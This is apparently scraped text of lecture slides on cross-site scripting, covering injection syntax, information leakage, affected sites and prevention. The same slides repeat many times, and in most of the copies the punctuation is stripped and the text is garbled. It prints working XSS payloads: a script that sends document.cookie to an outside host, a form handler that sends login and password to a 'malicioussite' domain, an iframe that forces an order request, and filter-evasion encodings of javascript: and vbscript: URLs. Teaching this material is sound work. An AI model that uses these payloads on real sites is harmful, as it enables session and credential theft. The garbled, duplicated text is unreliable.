SYNTAXscript injection in an image src tag1048708 Embed nested quotes1048708 rsquo or rdquo or u0022 u00271048708 Keyword filters that allow any js toexecute are useless1048708 A = lsquonavirsquo B = lsquogatoruserAgentrsquoalert(eval(A+B))Limited input length + script block embed= unlimited script power (script src=)1048708 SSL pages warn if script src comes fromuntrusted site1048708 but if you can upload say img that is actually jscommands1048708 methods of script encoding1048708 ltimgsrc=vbscriptdo63umentlo63ation=httpabcomgt1048708 ltIMG SRC=javascriptalert(test)gt1048708 ltIMG SRC=javasc riptalert(test)gt
35
Types of information leakageClient can reveal cookies to 3rd party (session state order info etc)
httphostaphpvariable=gtltscriptgtdocumentlocation=httpwwwcgisecuritycomcgi-bincookiecgi20+documentcookieltscriptgt
Client can reveal posted form items to 3rd party (userIDpasswd etc)
ltformgt action=logoninformationjsp method=post onsubmit=hackImg=new Image hackImgsrc=httpwwwmalicioussitecom+documentforms(1)loginvalue++ documentforms(1)passwordvalue ltformgt
Client can be tricked into accessingposting spoofed info to trusted server
wwwtrustedservercomxssaspname = ltiframe src=httpwwwtrustedservercomauth_areaorderupdateitems=4000gtltiframegt
36
YOU CAN FIND EXAMPLES OF XSS ON THESE WEBSITES
1 httpwwwcgisecuritycomarchivephpphpNuke_cross_site_scriptingtxt
2 httpwwwcgisecuritycomarchivephpphpNuke_CSS_5_holestxt
3 httpwwwcgisecuritycomarchivephpphpNuke_2_more_CSS_holestxt
37
Related vulnerabilitiesSeveral classes of vulnerabilities or attack techniques are related to XSS cross-zone scripting exploits zone concepts in certain browsers and usually executes code with a greater privilege[31] HTTP header injection can be used to create cross-site scripting conditions due to escaping problems on HTTP protocol level (in addition to enabling attacks such as HTTP response splitting)[32]
Cross-site request forgery (CSRFXSRF) is almost the opposite of XSS in that rather than exploiting the users trust in a site the attacker (and his malicious page) exploits the sites trust in the client software submitting requests that the site believes represent conscious and intentional actions of authenticated users[33]
Lastly SQL injection exploits a vulnerability in the database layer of an application When user input is incorrectly filtered any SQL statements can be executed by the application
22
Some FACTS about the XSS attackshelliphelliphellip
23
By SURVEYhelliphelliphellip
1st Gen XSS was against public sites and ran against everyone that visited site
2nd Gen XSS focused on sites that allow self-reflection XSS
24
bull Cross-site scripting attacks are a special case of code injection
bullCross-site scripting carried out on websites were roughly 80 of all security vulnerabilities documented by Symantec as of 2007
bullTheir impact may range from a petty nuisance to a significant security risk depending on the sensitivity of the data
Dynamic XSS with 2way commsVictim Browser
XSS against site
IFRAME
Script commands run here
Other documents on site loaded into here
ltscript src=ldquoattackercominnnerHTML_of_IFRAMErdquogt
XSS Vulnerable Server
Attacker System
New jscripthellip
ltscript src=ldquoattackercomrdquogt
26
Some prominent sites that have been affected in the past arehelliphellip
The search engine Google The email services of Google and
Yahoo The social networking sites Facebook
MySpace and Orkut The developers of MediaWiki have
fixed at least 26 XSS holes in order to protect Wikipedia and other wiki users
Researchers have claimed that as many as 68 of websites are likely open to XSS attacks
27
By seeing all this the question that arises ishelliphellip
Then how can we prevent it
28
Yes some methods are there for
prevention n those are gtgt Filteringgtgt Cookie Securitygtgt Disabling Scriptsgtgt Encryption
29
Filtering
One way to eliminate some XSS vulnerabilities is to validate and reject undesirable characters in input fields or escape all untrusted data using a method appropriate for the output context There are several different escaping schemes that must be used depending on where the untrusted string needs to be placedmdashincluding HTML numeric entity encoding JavaScript escaping CSS escaping and URL encoding Most web applications that do not need to accept rich data can use escaping to largely eliminate the risk of XSS in a fairly straightforward manner
30
Cookie Security
Many web applications rely on session cookies for authentication between individual HTTP requests and because client-side scripts generally have access to these cookies simple XSS exploits can steal these cookies To mitigate this particular threat many web applications tie session cookies to the IP address of the user who originally logged in and only permit that IP to use that cookie
31
Disabling Scriptshellip
Some browsers or browser plugins can be configured to disable client-side scripts on a per-domain basis
Functionality that blocks all scripting and external inclusions by default and then allows the user to enable it on a per-domain basis is more effectivehellip
Prblms wid thishellip Substantial reduction in functionality and
responsiveness Many sites do not work without client-side
scripting forcing users to disable protection for that site and opening their systems to the threat
32
The easiest way to protect yourself as a user is to only follow links from the main website you wish to view and use its search engine to find the content
33
For explaining Purpose
Remember the syntaxhellip
34
SYNTAXscript injection in an image src tag1048708 Embed nested quotes1048708 rsquo or rdquo or u0022 u00271048708 Keyword filters that allow any js toexecute are useless1048708 A = lsquonavirsquo B = lsquogatoruserAgentrsquoalert(eval(A+B))Limited input length + script block embed= unlimited script power (script src=)1048708 SSL pages warn if script src comes fromuntrusted site1048708 but if you can upload say img that is actually jscommands1048708 methods of script encoding1048708 ltimgsrc=vbscriptdo63umentlo63ation=httpabcomgt1048708 ltIMG SRC=javascriptalert(test)gt1048708 ltIMG SRC=javasc riptalert(test)gt
35
Types of information leakage
Client can reveal cookies to a 3rd party (session state, order info, etc.):
http://host/a.php?variable="><script>document.location='http://www.cgisecurity.com/cgi-bin/cookie.cgi?'%20+document.cookie</script>
Client can reveal posted form items to a 3rd party (userID/passwd, etc.):
<form> action="logoninformation.jsp" method="post" onsubmit="hackImg=new Image; hackImg.src='http://www.malicioussite.com/'+document.forms(1).login.value+':'+document.forms(1).password.value;" </form>
Client can be tricked into accessing/posting spoofed info to a trusted server:
www.trustedserver.com/xss.asp?name = <iframe src="http://www.trustedserver.com/auth_area/orderupdate?items=4000"></iframe>
36
YOU CAN FIND EXAMPLES OF XSS ON THESE WEBSITES
1. http://www.cgisecurity.com/archive/php/phpNuke_cross_site_scripting.txt
2. http://www.cgisecurity.com/archive/php/phpNuke_CSS_5_holes.txt
3. http://www.cgisecurity.com/archive/php/phpNuke_2_more_CSS_holes.txt
37
Related vulnerabilities
Several classes of vulnerabilities or attack techniques are related to XSS: cross-zone scripting exploits "zone" concepts in certain browsers and usually executes code with a greater privilege.[31] HTTP header injection can be used to create cross-site scripting conditions due to escaping problems at the HTTP protocol level (in addition to enabling attacks such as HTTP response splitting).[32]
Cross-site request forgery (CSRF/XSRF) is almost the opposite of XSS, in that rather than exploiting the user's trust in a site, the attacker (and his malicious page) exploits the site's trust in the client software, submitting requests that the site believes represent conscious and intentional actions of authenticated users.[33]
Lastly, SQL injection exploits a vulnerability in the database layer of an application. When user input is incorrectly filtered, any SQL statements can be executed by the application.
23
By SURVEY…
1st Gen XSS was against public sites and ran against everyone that visited the site.
2nd Gen XSS focused on sites that allow self-reflection XSS.
24
• Cross-site scripting attacks are a special case of code injection.
• Cross-site scripting carried out on websites accounted for roughly 80% of all security vulnerabilities documented by Symantec as of 2007.
• Their impact may range from a petty nuisance to a significant security risk, depending on the sensitivity of the data.
Figure: Dynamic XSS with 2-way comms. Victim Browser (XSS against site) holds an IFRAME in which script commands run and other documents on the site are loaded, via <script src="attacker.com/innerHTML_of_IFRAME">. XSS Vulnerable Server. Attacker System supplies new jscript… via <script src="attacker.com">.
26
Some prominent sites that have been affected in the past are…
The search engine Google; the email services of Google and Yahoo; the social networking sites Facebook, MySpace and Orkut. The developers of MediaWiki have fixed at least 26 XSS holes in order to protect Wikipedia and other wiki users.
Researchers have claimed that as many as 68% of websites are likely open to XSS attacks.
27
Seeing all this, the question that arises is…
Then how can we prevent it?
28
Yes, there are some methods for prevention, and those are: >> Filtering >> Cookie Security >> Disabling Scripts >> Encryption
29
Filtering
One way to eliminate some XSS vulnerabilities is to validate and reject undesirable characters in input fields or escape all untrusted data using a method appropriate for the output context There are several different escaping schemes that must be used depending on where the untrusted string needs to be placedmdashincluding HTML numeric entity encoding JavaScript escaping CSS escaping and URL encoding Most web applications that do not need to accept rich data can use escaping to largely eliminate the risk of XSS in a fairly straightforward manner
30
Cookie Security
Many web applications rely on session cookies for authentication between individual HTTP requests and because client-side scripts generally have access to these cookies simple XSS exploits can steal these cookies To mitigate this particular threat many web applications tie session cookies to the IP address of the user who originally logged in and only permit that IP to use that cookie
31
Disabling Scriptshellip
Some browsers or browser plugins can be configured to disable client-side scripts on a per-domain basis
Functionality that blocks all scripting and external inclusions by default and then allows the user to enable it on a per-domain basis is more effectivehellip
Prblms wid thishellip Substantial reduction in functionality and
responsiveness Many sites do not work without client-side
scripting forcing users to disable protection for that site and opening their systems to the threat
32
The easiest way to protect yourself as a user is to only follow links from the main website you wish to view and use its search engine to find the content
33
For explaining Purpose
Remember the syntaxhellip
34
SYNTAXscript injection in an image src tag1048708 Embed nested quotes1048708 rsquo or rdquo or u0022 u00271048708 Keyword filters that allow any js toexecute are useless1048708 A = lsquonavirsquo B = lsquogatoruserAgentrsquoalert(eval(A+B))Limited input length + script block embed= unlimited script power (script src=)1048708 SSL pages warn if script src comes fromuntrusted site1048708 but if you can upload say img that is actually jscommands1048708 methods of script encoding1048708 ltimgsrc=vbscriptdo63umentlo63ation=httpabcomgt1048708 ltIMG SRC=javascriptalert(test)gt1048708 ltIMG SRC=javasc riptalert(test)gt
35
Types of information leakageClient can reveal cookies to 3rd party (session state order info etc)
httphostaphpvariable=gtltscriptgtdocumentlocation=httpwwwcgisecuritycomcgi-bincookiecgi20+documentcookieltscriptgt
Client can reveal posted form items to 3rd party (userIDpasswd etc)
ltformgt action=logoninformationjsp method=post onsubmit=hackImg=new Image hackImgsrc=httpwwwmalicioussitecom+documentforms(1)loginvalue++ documentforms(1)passwordvalue ltformgt
Client can be tricked into accessingposting spoofed info to trusted server
wwwtrustedservercomxssaspname = ltiframe src=httpwwwtrustedservercomauth_areaorderupdateitems=4000gtltiframegt
36
YOU CAN FIND EXAMPLES OF XSS ON THESE WEBSITES
1 httpwwwcgisecuritycomarchivephpphpNuke_cross_site_scriptingtxt
2 httpwwwcgisecuritycomarchivephpphpNuke_CSS_5_holestxt
3 httpwwwcgisecuritycomarchivephpphpNuke_2_more_CSS_holestxt
37
Related vulnerabilitiesSeveral classes of vulnerabilities or attack techniques are related to XSS cross-zone scripting exploits zone concepts in certain browsers and usually executes code with a greater privilege[31] HTTP header injection can be used to create cross-site scripting conditions due to escaping problems on HTTP protocol level (in addition to enabling attacks such as HTTP response splitting)[32]
Cross-site request forgery (CSRFXSRF) is almost the opposite of XSS in that rather than exploiting the users trust in a site the attacker (and his malicious page) exploits the sites trust in the client software submitting requests that the site believes represent conscious and intentional actions of authenticated users[33]
Lastly SQL injection exploits a vulnerability in the database layer of an application When user input is incorrectly filtered any SQL statements can be executed by the application
24
bull Cross-site scripting attacks are a special case of code injection
bullCross-site scripting carried out on websites were roughly 80 of all security vulnerabilities documented by Symantec as of 2007
bullTheir impact may range from a petty nuisance to a significant security risk depending on the sensitivity of the data
Dynamic XSS with 2way commsVictim Browser
XSS against site
IFRAME
Script commands run here
Other documents on site loaded into here
ltscript src=ldquoattackercominnnerHTML_of_IFRAMErdquogt
XSS Vulnerable Server
Attacker System
New jscripthellip
ltscript src=ldquoattackercomrdquogt
26
Some prominent sites that have been affected in the past arehelliphellip
The search engine Google The email services of Google and
Yahoo The social networking sites Facebook
MySpace and Orkut The developers of MediaWiki have
fixed at least 26 XSS holes in order to protect Wikipedia and other wiki users
Researchers have claimed that as many as 68 of websites are likely open to XSS attacks
27
By seeing all this the question that arises ishelliphellip
Then how can we prevent it
28
Yes some methods are there for
prevention n those are gtgt Filteringgtgt Cookie Securitygtgt Disabling Scriptsgtgt Encryption
29
Filtering
One way to eliminate some XSS vulnerabilities is to validate and reject undesirable characters in input fields or escape all untrusted data using a method appropriate for the output context There are several different escaping schemes that must be used depending on where the untrusted string needs to be placedmdashincluding HTML numeric entity encoding JavaScript escaping CSS escaping and URL encoding Most web applications that do not need to accept rich data can use escaping to largely eliminate the risk of XSS in a fairly straightforward manner
30
Cookie Security
Many web applications rely on session cookies for authentication between individual HTTP requests and because client-side scripts generally have access to these cookies simple XSS exploits can steal these cookies To mitigate this particular threat many web applications tie session cookies to the IP address of the user who originally logged in and only permit that IP to use that cookie
31
Disabling Scriptshellip
Some browsers or browser plugins can be configured to disable client-side scripts on a per-domain basis
Functionality that blocks all scripting and external inclusions by default and then allows the user to enable it on a per-domain basis is more effectivehellip
Prblms wid thishellip Substantial reduction in functionality and
responsiveness Many sites do not work without client-side
scripting forcing users to disable protection for that site and opening their systems to the threat
32
The easiest way to protect yourself as a user is to only follow links from the main website you wish to view and use its search engine to find the content
33
For explaining Purpose
Remember the syntaxhellip
34
SYNTAXscript injection in an image src tag1048708 Embed nested quotes1048708 rsquo or rdquo or u0022 u00271048708 Keyword filters that allow any js toexecute are useless1048708 A = lsquonavirsquo B = lsquogatoruserAgentrsquoalert(eval(A+B))Limited input length + script block embed= unlimited script power (script src=)1048708 SSL pages warn if script src comes fromuntrusted site1048708 but if you can upload say img that is actually jscommands1048708 methods of script encoding1048708 ltimgsrc=vbscriptdo63umentlo63ation=httpabcomgt1048708 ltIMG SRC=javascriptalert(test)gt1048708 ltIMG SRC=javasc riptalert(test)gt
35
Types of information leakageClient can reveal cookies to 3rd party (session state order info etc)
httphostaphpvariable=gtltscriptgtdocumentlocation=httpwwwcgisecuritycomcgi-bincookiecgi20+documentcookieltscriptgt
Client can reveal posted form items to 3rd party (userIDpasswd etc)
ltformgt action=logoninformationjsp method=post onsubmit=hackImg=new Image hackImgsrc=httpwwwmalicioussitecom+documentforms(1)loginvalue++ documentforms(1)passwordvalue ltformgt
Client can be tricked into accessingposting spoofed info to trusted server
wwwtrustedservercomxssaspname = ltiframe src=httpwwwtrustedservercomauth_areaorderupdateitems=4000gtltiframegt
36
YOU CAN FIND EXAMPLES OF XSS ON THESE WEBSITES
1 httpwwwcgisecuritycomarchivephpphpNuke_cross_site_scriptingtxt
2 httpwwwcgisecuritycomarchivephpphpNuke_CSS_5_holestxt
3 httpwwwcgisecuritycomarchivephpphpNuke_2_more_CSS_holestxt
37
Related vulnerabilitiesSeveral classes of vulnerabilities or attack techniques are related to XSS cross-zone scripting exploits zone concepts in certain browsers and usually executes code with a greater privilege[31] HTTP header injection can be used to create cross-site scripting conditions due to escaping problems on HTTP protocol level (in addition to enabling attacks such as HTTP response splitting)[32]
Cross-site request forgery (CSRFXSRF) is almost the opposite of XSS in that rather than exploiting the users trust in a site the attacker (and his malicious page) exploits the sites trust in the client software submitting requests that the site believes represent conscious and intentional actions of authenticated users[33]
Lastly SQL injection exploits a vulnerability in the database layer of an application When user input is incorrectly filtered any SQL statements can be executed by the application
Dynamic XSS with 2way commsVictim Browser
XSS against site
IFRAME
Script commands run here
Other documents on site loaded into here
ltscript src=ldquoattackercominnnerHTML_of_IFRAMErdquogt
XSS Vulnerable Server
Attacker System
New jscripthellip
ltscript src=ldquoattackercomrdquogt
26
Some prominent sites that have been affected in the past arehelliphellip
The search engine Google The email services of Google and
Yahoo The social networking sites Facebook
MySpace and Orkut The developers of MediaWiki have
fixed at least 26 XSS holes in order to protect Wikipedia and other wiki users
Researchers have claimed that as many as 68 of websites are likely open to XSS attacks
27
By seeing all this the question that arises ishelliphellip
Then how can we prevent it
28
Yes some methods are there for
prevention n those are gtgt Filteringgtgt Cookie Securitygtgt Disabling Scriptsgtgt Encryption
29
Filtering
One way to eliminate some XSS vulnerabilities is to validate and reject undesirable characters in input fields or escape all untrusted data using a method appropriate for the output context There are several different escaping schemes that must be used depending on where the untrusted string needs to be placedmdashincluding HTML numeric entity encoding JavaScript escaping CSS escaping and URL encoding Most web applications that do not need to accept rich data can use escaping to largely eliminate the risk of XSS in a fairly straightforward manner
30
Cookie Security
Many web applications rely on session cookies for authentication between individual HTTP requests and because client-side scripts generally have access to these cookies simple XSS exploits can steal these cookies To mitigate this particular threat many web applications tie session cookies to the IP address of the user who originally logged in and only permit that IP to use that cookie
31
Disabling Scriptshellip
Some browsers or browser plugins can be configured to disable client-side scripts on a per-domain basis
Functionality that blocks all scripting and external inclusions by default and then allows the user to enable it on a per-domain basis is more effectivehellip
Prblms wid thishellip Substantial reduction in functionality and
responsiveness Many sites do not work without client-side
scripting forcing users to disable protection for that site and opening their systems to the threat
32
The easiest way to protect yourself as a user is to only follow links from the main website you wish to view and use its search engine to find the content
33
For explaining Purpose
Remember the syntaxhellip
34
SYNTAXscript injection in an image src tag1048708 Embed nested quotes1048708 rsquo or rdquo or u0022 u00271048708 Keyword filters that allow any js toexecute are useless1048708 A = lsquonavirsquo B = lsquogatoruserAgentrsquoalert(eval(A+B))Limited input length + script block embed= unlimited script power (script src=)1048708 SSL pages warn if script src comes fromuntrusted site1048708 but if you can upload say img that is actually jscommands1048708 methods of script encoding1048708 ltimgsrc=vbscriptdo63umentlo63ation=httpabcomgt1048708 ltIMG SRC=javascriptalert(test)gt1048708 ltIMG SRC=javasc riptalert(test)gt
35
Types of information leakageClient can reveal cookies to 3rd party (session state order info etc)
httphostaphpvariable=gtltscriptgtdocumentlocation=httpwwwcgisecuritycomcgi-bincookiecgi20+documentcookieltscriptgt
Client can reveal posted form items to 3rd party (userIDpasswd etc)
ltformgt action=logoninformationjsp method=post onsubmit=hackImg=new Image hackImgsrc=httpwwwmalicioussitecom+documentforms(1)loginvalue++ documentforms(1)passwordvalue ltformgt
Client can be tricked into accessingposting spoofed info to trusted server
wwwtrustedservercomxssaspname = ltiframe src=httpwwwtrustedservercomauth_areaorderupdateitems=4000gtltiframegt
36
YOU CAN FIND EXAMPLES OF XSS ON THESE WEBSITES
1 httpwwwcgisecuritycomarchivephpphpNuke_cross_site_scriptingtxt
2 httpwwwcgisecuritycomarchivephpphpNuke_CSS_5_holestxt
3 httpwwwcgisecuritycomarchivephpphpNuke_2_more_CSS_holestxt
37
Related vulnerabilitiesSeveral classes of vulnerabilities or attack techniques are related to XSS cross-zone scripting exploits zone concepts in certain browsers and usually executes code with a greater privilege[31] HTTP header injection can be used to create cross-site scripting conditions due to escaping problems on HTTP protocol level (in addition to enabling attacks such as HTTP response splitting)[32]
Cross-site request forgery (CSRFXSRF) is almost the opposite of XSS in that rather than exploiting the users trust in a site the attacker (and his malicious page) exploits the sites trust in the client software submitting requests that the site believes represent conscious and intentional actions of authenticated users[33]
Lastly SQL injection exploits a vulnerability in the database layer of an application When user input is incorrectly filtered any SQL statements can be executed by the application
26
Some prominent sites that have been affected in the past arehelliphellip
The search engine Google The email services of Google and
Yahoo The social networking sites Facebook
MySpace and Orkut The developers of MediaWiki have
fixed at least 26 XSS holes in order to protect Wikipedia and other wiki users
Researchers have claimed that as many as 68 of websites are likely open to XSS attacks
27
By seeing all this the question that arises ishelliphellip
Then how can we prevent it
28
Yes some methods are there for
prevention n those are gtgt Filteringgtgt Cookie Securitygtgt Disabling Scriptsgtgt Encryption
29
Filtering
One way to eliminate some XSS vulnerabilities is to validate and reject undesirable characters in input fields or escape all untrusted data using a method appropriate for the output context There are several different escaping schemes that must be used depending on where the untrusted string needs to be placedmdashincluding HTML numeric entity encoding JavaScript escaping CSS escaping and URL encoding Most web applications that do not need to accept rich data can use escaping to largely eliminate the risk of XSS in a fairly straightforward manner
30
Cookie Security
Many web applications rely on session cookies for authentication between individual HTTP requests and because client-side scripts generally have access to these cookies simple XSS exploits can steal these cookies To mitigate this particular threat many web applications tie session cookies to the IP address of the user who originally logged in and only permit that IP to use that cookie
31
Disabling Scriptshellip
Some browsers or browser plugins can be configured to disable client-side scripts on a per-domain basis
Functionality that blocks all scripting and external inclusions by default and then allows the user to enable it on a per-domain basis is more effectivehellip
Prblms wid thishellip Substantial reduction in functionality and
responsiveness Many sites do not work without client-side
scripting forcing users to disable protection for that site and opening their systems to the threat
32
The easiest way to protect yourself as a user is to only follow links from the main website you wish to view and use its search engine to find the content
33
For explaining Purpose
Remember the syntaxhellip
34
SYNTAXscript injection in an image src tag1048708 Embed nested quotes1048708 rsquo or rdquo or u0022 u00271048708 Keyword filters that allow any js toexecute are useless1048708 A = lsquonavirsquo B = lsquogatoruserAgentrsquoalert(eval(A+B))Limited input length + script block embed= unlimited script power (script src=)1048708 SSL pages warn if script src comes fromuntrusted site1048708 but if you can upload say img that is actually jscommands1048708 methods of script encoding1048708 ltimgsrc=vbscriptdo63umentlo63ation=httpabcomgt1048708 ltIMG SRC=javascriptalert(test)gt1048708 ltIMG SRC=javasc riptalert(test)gt
35
Types of information leakageClient can reveal cookies to 3rd party (session state order info etc)
httphostaphpvariable=gtltscriptgtdocumentlocation=httpwwwcgisecuritycomcgi-bincookiecgi20+documentcookieltscriptgt
Client can reveal posted form items to 3rd party (userIDpasswd etc)
ltformgt action=logoninformationjsp method=post onsubmit=hackImg=new Image hackImgsrc=httpwwwmalicioussitecom+documentforms(1)loginvalue++ documentforms(1)passwordvalue ltformgt
Client can be tricked into accessingposting spoofed info to trusted server
wwwtrustedservercomxssaspname = ltiframe src=httpwwwtrustedservercomauth_areaorderupdateitems=4000gtltiframegt
36
YOU CAN FIND EXAMPLES OF XSS ON THESE WEBSITES
1 httpwwwcgisecuritycomarchivephpphpNuke_cross_site_scriptingtxt
2 httpwwwcgisecuritycomarchivephpphpNuke_CSS_5_holestxt
3 httpwwwcgisecuritycomarchivephpphpNuke_2_more_CSS_holestxt
37
Related vulnerabilitiesSeveral classes of vulnerabilities or attack techniques are related to XSS cross-zone scripting exploits zone concepts in certain browsers and usually executes code with a greater privilege[31] HTTP header injection can be used to create cross-site scripting conditions due to escaping problems on HTTP protocol level (in addition to enabling attacks such as HTTP response splitting)[32]
Cross-site request forgery (CSRFXSRF) is almost the opposite of XSS in that rather than exploiting the users trust in a site the attacker (and his malicious page) exploits the sites trust in the client software submitting requests that the site believes represent conscious and intentional actions of authenticated users[33]
Lastly SQL injection exploits a vulnerability in the database layer of an application When user input is incorrectly filtered any SQL statements can be executed by the application
27
By seeing all this the question that arises ishelliphellip
Then how can we prevent it
28
Yes some methods are there for
prevention n those are gtgt Filteringgtgt Cookie Securitygtgt Disabling Scriptsgtgt Encryption
29
Filtering
One way to eliminate some XSS vulnerabilities is to validate and reject undesirable characters in input fields or escape all untrusted data using a method appropriate for the output context There are several different escaping schemes that must be used depending on where the untrusted string needs to be placedmdashincluding HTML numeric entity encoding JavaScript escaping CSS escaping and URL encoding Most web applications that do not need to accept rich data can use escaping to largely eliminate the risk of XSS in a fairly straightforward manner
30
Cookie Security
Many web applications rely on session cookies for authentication between individual HTTP requests and because client-side scripts generally have access to these cookies simple XSS exploits can steal these cookies To mitigate this particular threat many web applications tie session cookies to the IP address of the user who originally logged in and only permit that IP to use that cookie
31
Disabling Scriptshellip
Some browsers or browser plugins can be configured to disable client-side scripts on a per-domain basis
Functionality that blocks all scripting and external inclusions by default and then allows the user to enable it on a per-domain basis is more effectivehellip
Prblms wid thishellip Substantial reduction in functionality and
responsiveness Many sites do not work without client-side
scripting forcing users to disable protection for that site and opening their systems to the threat
32
The easiest way to protect yourself as a user is to only follow links from the main website you wish to view and use its search engine to find the content
33
For explaining Purpose
Remember the syntaxhellip
34
SYNTAXscript injection in an image src tag1048708 Embed nested quotes1048708 rsquo or rdquo or u0022 u00271048708 Keyword filters that allow any js toexecute are useless1048708 A = lsquonavirsquo B = lsquogatoruserAgentrsquoalert(eval(A+B))Limited input length + script block embed= unlimited script power (script src=)1048708 SSL pages warn if script src comes fromuntrusted site1048708 but if you can upload say img that is actually jscommands1048708 methods of script encoding1048708 ltimgsrc=vbscriptdo63umentlo63ation=httpabcomgt1048708 ltIMG SRC=javascriptalert(test)gt1048708 ltIMG SRC=javasc riptalert(test)gt
35
Types of information leakageClient can reveal cookies to 3rd party (session state order info etc)
httphostaphpvariable=gtltscriptgtdocumentlocation=httpwwwcgisecuritycomcgi-bincookiecgi20+documentcookieltscriptgt
Client can reveal posted form items to 3rd party (userIDpasswd etc)
ltformgt action=logoninformationjsp method=post onsubmit=hackImg=new Image hackImgsrc=httpwwwmalicioussitecom+documentforms(1)loginvalue++ documentforms(1)passwordvalue ltformgt
Client can be tricked into accessingposting spoofed info to trusted server
wwwtrustedservercomxssaspname = ltiframe src=httpwwwtrustedservercomauth_areaorderupdateitems=4000gtltiframegt
36
YOU CAN FIND EXAMPLES OF XSS ON THESE WEBSITES
1 httpwwwcgisecuritycomarchivephpphpNuke_cross_site_scriptingtxt
2 httpwwwcgisecuritycomarchivephpphpNuke_CSS_5_holestxt
3 httpwwwcgisecuritycomarchivephpphpNuke_2_more_CSS_holestxt
37
Related vulnerabilitiesSeveral classes of vulnerabilities or attack techniques are related to XSS cross-zone scripting exploits zone concepts in certain browsers and usually executes code with a greater privilege[31] HTTP header injection can be used to create cross-site scripting conditions due to escaping problems on HTTP protocol level (in addition to enabling attacks such as HTTP response splitting)[32]
Cross-site request forgery (CSRFXSRF) is almost the opposite of XSS in that rather than exploiting the users trust in a site the attacker (and his malicious page) exploits the sites trust in the client software submitting requests that the site believes represent conscious and intentional actions of authenticated users[33]
Lastly SQL injection exploits a vulnerability in the database layer of an application When user input is incorrectly filtered any SQL statements can be executed by the application
28
Yes some methods are there for
prevention n those are gtgt Filteringgtgt Cookie Securitygtgt Disabling Scriptsgtgt Encryption
29
Filtering
One way to eliminate some XSS vulnerabilities is to validate and reject undesirable characters in input fields or escape all untrusted data using a method appropriate for the output context There are several different escaping schemes that must be used depending on where the untrusted string needs to be placedmdashincluding HTML numeric entity encoding JavaScript escaping CSS escaping and URL encoding Most web applications that do not need to accept rich data can use escaping to largely eliminate the risk of XSS in a fairly straightforward manner
30
Cookie Security
Many web applications rely on session cookies for authentication between individual HTTP requests and because client-side scripts generally have access to these cookies simple XSS exploits can steal these cookies To mitigate this particular threat many web applications tie session cookies to the IP address of the user who originally logged in and only permit that IP to use that cookie
31
Disabling Scriptshellip
Some browsers or browser plugins can be configured to disable client-side scripts on a per-domain basis
Functionality that blocks all scripting and external inclusions by default and then allows the user to enable it on a per-domain basis is more effectivehellip
Prblms wid thishellip Substantial reduction in functionality and
responsiveness Many sites do not work without client-side
scripting forcing users to disable protection for that site and opening their systems to the threat
32
The easiest way to protect yourself as a user is to only follow links from the main website you wish to view and use its search engine to find the content
33
For explaining Purpose
Remember the syntaxhellip
34
SYNTAXscript injection in an image src tag1048708 Embed nested quotes1048708 rsquo or rdquo or u0022 u00271048708 Keyword filters that allow any js toexecute are useless1048708 A = lsquonavirsquo B = lsquogatoruserAgentrsquoalert(eval(A+B))Limited input length + script block embed= unlimited script power (script src=)1048708 SSL pages warn if script src comes fromuntrusted site1048708 but if you can upload say img that is actually jscommands1048708 methods of script encoding1048708 ltimgsrc=vbscriptdo63umentlo63ation=httpabcomgt1048708 ltIMG SRC=javascriptalert(test)gt1048708 ltIMG SRC=javasc riptalert(test)gt
35
Types of information leakageClient can reveal cookies to 3rd party (session state order info etc)
httphostaphpvariable=gtltscriptgtdocumentlocation=httpwwwcgisecuritycomcgi-bincookiecgi20+documentcookieltscriptgt
Client can reveal posted form items to 3rd party (userIDpasswd etc)
ltformgt action=logoninformationjsp method=post onsubmit=hackImg=new Image hackImgsrc=httpwwwmalicioussitecom+documentforms(1)loginvalue++ documentforms(1)passwordvalue ltformgt
Client can be tricked into accessingposting spoofed info to trusted server
wwwtrustedservercomxssaspname = ltiframe src=httpwwwtrustedservercomauth_areaorderupdateitems=4000gtltiframegt
36
YOU CAN FIND EXAMPLES OF XSS ON THESE WEBSITES
1 httpwwwcgisecuritycomarchivephpphpNuke_cross_site_scriptingtxt
2 httpwwwcgisecuritycomarchivephpphpNuke_CSS_5_holestxt
3 httpwwwcgisecuritycomarchivephpphpNuke_2_more_CSS_holestxt
37
Related vulnerabilitiesSeveral classes of vulnerabilities or attack techniques are related to XSS cross-zone scripting exploits zone concepts in certain browsers and usually executes code with a greater privilege[31] HTTP header injection can be used to create cross-site scripting conditions due to escaping problems on HTTP protocol level (in addition to enabling attacks such as HTTP response splitting)[32]
Cross-site request forgery (CSRFXSRF) is almost the opposite of XSS in that rather than exploiting the users trust in a site the attacker (and his malicious page) exploits the sites trust in the client software submitting requests that the site believes represent conscious and intentional actions of authenticated users[33]
Lastly SQL injection exploits a vulnerability in the database layer of an application When user input is incorrectly filtered any SQL statements can be executed by the application
29
Filtering
One way to eliminate some XSS vulnerabilities is to validate and reject undesirable characters in input fields or escape all untrusted data using a method appropriate for the output context There are several different escaping schemes that must be used depending on where the untrusted string needs to be placedmdashincluding HTML numeric entity encoding JavaScript escaping CSS escaping and URL encoding Most web applications that do not need to accept rich data can use escaping to largely eliminate the risk of XSS in a fairly straightforward manner
30
Cookie Security
Many web applications rely on session cookies for authentication between individual HTTP requests and because client-side scripts generally have access to these cookies simple XSS exploits can steal these cookies To mitigate this particular threat many web applications tie session cookies to the IP address of the user who originally logged in and only permit that IP to use that cookie
31
Disabling scripts…
Some browsers or browser plug-ins can be configured to disable client-side scripts on a per-domain basis.
Functionality that blocks all scripting and external inclusions by default and then lets the user enable it per domain is more effective…
Problems with this… a substantial reduction in functionality and responsiveness. Many sites do not work without client-side scripting, forcing users to disable the protection for that site and reopening their systems to the threat.
32
The easiest way to protect yourself as a user is to follow only links from the main website you wish to view, and to use that site's own search engine to find content, rather than following links supplied in e-mail or on other sites.
33
For explanation purposes, remember the syntax…
34
SYNTAX: script injection in an image src tag
>> Embed nested quotes: ’ or ” or \u0022 \u0027
>> Keyword filters that allow any JS to execute are useless. A filter that strips the word "navigator" is defeated by assembling it at run time: A = 'navi'; B = 'gator.userAgent'; alert(eval(A+B))
>> Limited input length + script block embed = unlimited script power (<script src=...> pulls the real payload from elsewhere)
>> Pages served over SSL warn if a script src comes from an untrusted site… but if you can upload, say, an "image" that is actually JS commands, it can be included from the trusted host itself
>> Methods of script encoding:
<img src="vbscript:do&#x63;ument.lo&#x63;ation='http://ab.com'">
<IMG SRC="javascript:alert('test')">
<IMG SRC="javasc&#09;ript:alert('test')">   (a tab inside the scheme name, written here as the entity &#09;; the browser decodes the entity and ignores the control character, so the URL is still javascript:)
